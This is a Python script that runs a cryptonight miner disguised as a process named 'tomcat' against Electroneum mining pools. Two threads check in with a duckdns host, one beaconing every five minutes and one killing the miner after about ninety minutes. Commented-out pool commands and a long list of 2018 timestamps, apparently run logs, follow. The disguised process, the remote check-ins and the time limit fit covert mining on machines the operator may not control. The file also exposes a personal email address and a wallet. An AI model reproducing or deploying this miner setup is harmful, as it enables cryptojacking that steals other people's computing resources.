import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:44:03.823782
#2018-02-17 16:31:05.457555
#2018-02-17 18:19:07.175092
#2018-02-17 20:07:07.091886
#2018-02-17 21:55:01.433230
#2018-02-17 23:40:01.611968
#2018-02-18 01:29:05.764275
#2018-02-18 03:16:01.364891
#2018-02-18 05:05:03.390698
#2018-02-18 06:56:04.113197
#2018-02-18 08:43:07.087930
#2018-02-18 10:29:07.472891
#2018-02-18 12:15:06.303800
#2018-02-18 14:02:01.940194
#2018-02-18 15:52:01.951328
#2018-02-18 17:42:06.378163
#2018-02-18 19:30:02.240887
#2018-02-18 21:15:08.357364
#2018-02-18 23:02:06.427498
#2018-02-19 00:49:04.190125
#2018-02-19 02:36:06.652687
#2018-02-19 04:22:01.399926
#2018-02-19 06:07:02.183197
#2018-02-19 07:55:03.230003
#2018-02-19 09:46:07.358861
#2018-02-19 11:36:01.872658
#2018-02-19 13:22:07.237082
#2018-02-19 15:16:10.180953
#2018-02-19 17:05:06.194308
#2018-02-19 18:50:01.617215
#2018-02-19 20:39:05.579241
#2018-02-19 22:26:04.247960
#2018-02-20 00:12:08.717762
#2018-02-20 01:59:05.629411
#2018-02-20 03:49:01.502120
#2018-02-20 05:33:06.021785
#2018-02-20 07:17:05.217818
#2018-02-20 09:03:08.156391
#2018-02-20 10:47:04.902183
#2018-02-20 12:34:04.526178
#2018-02-20 14:21:01.669211
#2018-02-20 16:04:10.328574
#2018-02-20 17:51:05.037479
#2018-02-20 19:43:04.901582
#2018-02-20 21:31:01.816259
#2018-02-20 23:13:06.012368
#2018-02-21 00:57:07.107571
#2018-02-21 02:45:08.777540
#2018-02-21 04:34:06.673930
#2018-02-21 06:22:04.012427
#2018-02-21 08:06:09.594414
#2018-02-21 09:52:07.276883
#2018-02-21 11:41:01.403667
#2018-02-21 13:31:11.256524
#2018-02-21 15:17:01.991043
#2018-02-21 17:07:09.715303
#2018-02-21 18:54:06.385441
#2018-02-21 20:43:07.412035
#2018-02-21 22:27:07.714677
#2018-02-22 00:18:02.233720
#2018-02-22 02:05:06.025042
#2018-02-22 03:51:05.577112
#2018-02-22 05:39:04.153757
#2018-02-22 07:24:06.386494
#2018-02-22 09:12:04.523441
#2018-02-22 10:59:05.318385
#2018-02-22 12:44:05.976363
#2018-02-22 14:29:08.522551
#2018-02-22 16:15:12.101071
#2018-02-22 18:01:11.366268
#2018-02-22 19:49:02.039115
#2018-02-22 21:39:06.574490
#2018-02-22 23:27:02.171266
#2018-02-23 01:14:01.543875
#2018-02-23 02:59:07.480147
#2018-02-23 04:46:06.535254
#2018-02-23 06:32:01.428904
#2018-02-23 08:19:02.033526
#2018-02-23 10:35:06.937748
#2018-02-23 12:28:01.438831
#2018-02-23 14:16:08.630827
#2018-02-23 16:08:01.687352
#2018-02-23 17:54:05.802764
#2018-02-23 19:40:08.506266
#2018-02-23 21:22:08.748893
#2018-02-23 23:11:03.902472
#2018-02-24 00:59:03.763832
#2018-02-24 02:53:06.611388
#2018-02-24 04:43:01.749043
#2018-02-24 06:27:07.721146
#2018-02-24 08:16:04.325852
#2018-02-24 09:59:06.438778
#2018-02-24 11:58:04.767208
#2018-02-24 13:46:08.006118
#2018-02-24 15:34:07.123743
#2018-02-24 17:29:06.881969
#2018-02-24 19:16:06.117422
#2018-02-24 21:04:03.493111
#2018-02-24 23:38:04.401172
#2018-02-25 03:46:06.519571
#2018-02-25 07:31:04.684476